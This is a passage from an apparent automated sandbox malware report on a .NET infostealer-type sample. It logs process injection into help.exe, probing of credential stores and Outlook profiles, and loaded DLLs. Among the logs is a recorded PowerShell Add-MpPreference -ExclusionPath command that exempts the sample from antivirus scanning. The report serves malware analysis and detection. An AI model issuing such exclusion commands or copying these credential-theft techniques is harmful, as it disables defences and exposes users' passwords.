                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B5343012_2_02B53430
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B4CA2012_2_02B4CA20
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B4CA1712_2_02B4CA17
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B4AC2012_2_02B4AC20
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B4AC1612_2_02B4AC16
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B4CC4012_2_02B4CC40
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B4ADB912_2_02B4ADB9
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B4AD7012_2_02B4AD70
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B4AD6512_2_02B4AD65
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_037A526412_2_037A5264
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0379E2F712_2_0379E2F7
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0379E1D812_2_0379E1D8
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0379D75812_2_0379D758
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0379E68D12_2_0379E68D
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0379C96312_2_0379C963
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0379C9F812_2_0379C9F8
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: String function: 018CF290 appears 105 times
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: String function: 01885130 appears 58 times
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: String function: 018BEA12 appears 86 times
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: String function: 0183B970 appears 250 times
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: String function: 01897E54 appears 101 times
                Source: C:\Windows\SysWOW64\help.exeCode function: String function: 034EEA12 appears 86 times
                Source: C:\Windows\SysWOW64\help.exeCode function: String function: 034C7E54 appears 98 times
                Source: C:\Windows\SysWOW64\help.exeCode function: String function: 0346B970 appears 244 times
                Source: C:\Windows\SysWOW64\help.exeCode function: String function: 034B5130 appears 40 times
                Source: C:\Windows\SysWOW64\help.exeCode function: String function: 034FF290 appears 105 times
                Source: Zjf9D3oDifslon7.bat.exe, 00000000.00000002.1277282682.00000000010FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Zjf9D3oDifslon7.bat.exe
                Source: Zjf9D3oDifslon7.bat.exe, 00000000.00000002.1287457712.0000000002DC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs Zjf9D3oDifslon7.bat.exe
                Source: Zjf9D3oDifslon7.bat.exe, 00000000.00000000.1259039079.0000000000A42000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameiWNI.exeD vs Zjf9D3oDifslon7.bat.exe
                Source: Zjf9D3oDifslon7.bat.exe, 00000000.00000002.1308889768.0000000009180000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Zjf9D3oDifslon7.bat.exe
                Source: Zjf9D3oDifslon7.bat.exe, 00000000.00000002.1307186326.0000000007200000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs Zjf9D3oDifslon7.bat.exe
                Source: Zjf9D3oDifslon7.bat.exe, 00000005.00000002.1426102978.000000000193D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Zjf9D3oDifslon7.bat.exe
                Source: Zjf9D3oDifslon7.bat.exe, 00000005.00000002.1425850688.00000000013B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs Zjf9D3oDifslon7.bat.exe
                Source: Zjf9D3oDifslon7.bat.exe, 00000005.00000002.1425850688.00000000013A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs Zjf9D3oDifslon7.bat.exe
                Source: Zjf9D3oDifslon7.bat.exeBinary or memory string: OriginalFilenameiWNI.exeD vs Zjf9D3oDifslon7.bat.exe
                Source: Zjf9D3oDifslon7.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Zjf9D3oDifslon7.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, KJ0XgBe9sHdtVTebjt.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, KJ0XgBe9sHdtVTebjt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, KJ0XgBe9sHdtVTebjt.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, e1UZNiBuDuWYUad08v.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, e1UZNiBuDuWYUad08v.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/7@16/13
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Zjf9D3oDifslon7.bat.exe.logJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4868:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ecjg21v4.zkh.ps1Jump to behavior
                Source: Zjf9D3oDifslon7.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Zjf9D3oDifslon7.bat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: help.exe, 0000000C.00000002.3722073116.0000000003044000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3722073116.0000000003093000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3722073116.0000000003065000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3722073116.0000000003070000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000003.1606080046.0000000003065000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Zjf9D3oDifslon7.bat.exeVirustotal: Detection: 50%
                Source: Zjf9D3oDifslon7.bat.exeReversingLabs: Detection: 47%
                Source: unknownProcess created: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe"
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess created: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeProcess created: C:\Windows\SysWOW64\help.exe "C:\Windows\SysWOW64\help.exe"
                Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeProcess created: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe "C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe"Jump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeProcess created: C:\Windows\SysWOW64\help.exe "C:\Windows\SysWOW64\help.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\BOFpLrjadtjBxKxPfBpVlLtTLKLjsDDcYKduJDGPpCeDyKNlFwP\nS7xrGJCV5KYH1dhdb.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Zjf9D3oDifslon7.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Zjf9D3oDifslon7.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Zjf9D3oDifslon7.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: iWNI.pdb source: Zjf9D3oDifslon7.bat.exe
                Source: Binary string: wntdll.pdbUGP source: Zjf9D3oDifslon7.bat.exe, 00000005.00000002.1426102978.0000000001810000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724128272.0000000003440000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000C.00000003.1427785390.0000000003298000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000003.1425876319.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724128272.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Zjf9D3oDifslon7.bat.exe, Zjf9D3oDifslon7.bat.exe, 00000005.00000002.1426102978.0000000001810000.00000040.00001000.00020000.00000000.sdmp, help.exe, help.exe, 0000000C.00000002.3724128272.0000000003440000.00000040.00001000.00020000.00000000.sdmp, help.exe, 0000000C.00000003.1427785390.0000000003298000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000003.1425876319.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3724128272.00000000035DE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: iWNI.pdbSHA256 source: Zjf9D3oDifslon7.bat.exe
                Source: Binary string: help.pdbGCTL source: Zjf9D3oDifslon7.bat.exe, 00000005.00000002.1425850688.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000B.00000002.3723057357.000000000095E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: help.pdb source: Zjf9D3oDifslon7.bat.exe, 00000005.00000002.1425850688.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000B.00000002.3723057357.000000000095E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nS7xrGJCV5KYH1dhdb.exe, 0000000B.00000002.3722689846.000000000085F000.00000002.00000001.01000000.0000000A.sdmp, nS7xrGJCV5KYH1dhdb.exe, 0000000E.00000002.3722822138.000000000085F000.00000002.00000001.01000000.0000000A.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.Zjf9D3oDifslon7.bat.exe.9180000.4.raw.unpack, KJ0XgBe9sHdtVTebjt.cs.Net Code: AF88iys6gT System.Reflection.Assembly.Load(byte[])
                Source: Zjf9D3oDifslon7.bat.exeStatic PE information: 0xD5B00858 [Tue Aug 10 00:31:20 2083 UTC]
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0041E87E push es; retf 5_2_0041E880
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0041E88A push esi; ret 5_2_0041E88B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_00404956 push CD785CF3h; ret 5_2_00404960
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_004051F5 push ebx; retf 5_2_004051FA
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_004139A3 push esi; ret 5_2_004139AA
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_00405A87 push ecx; retf 5_2_00405A91
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0041ABDA push esi; ret 5_2_0041ABEA
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0041ABE3 push esi; ret 5_2_0041ABEA
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_00417C4D push 00000024h; ret 5_2_00417C4F
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_00418C73 push eax; ret 5_2_00418D0A
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_004034F0 push eax; ret 5_2_004034F2
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_00417570 push edx; retf 5_2_00417596
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_00418DD0 push es; iretd 5_2_00418DD1
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_004185A9 push A3C436E7h; ret 5_2_004185CB
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_00404EC1 push ecx; iretd 5_2_00404EC6
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0041074B push 3788F9D1h; ret 5_2_00410752
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0040D709 push esp; iretd 5_2_0040D70A
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0041971B push ebx; iretd 5_2_00419720
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_00417FCA push ebx; retf 5_2_00417FDD
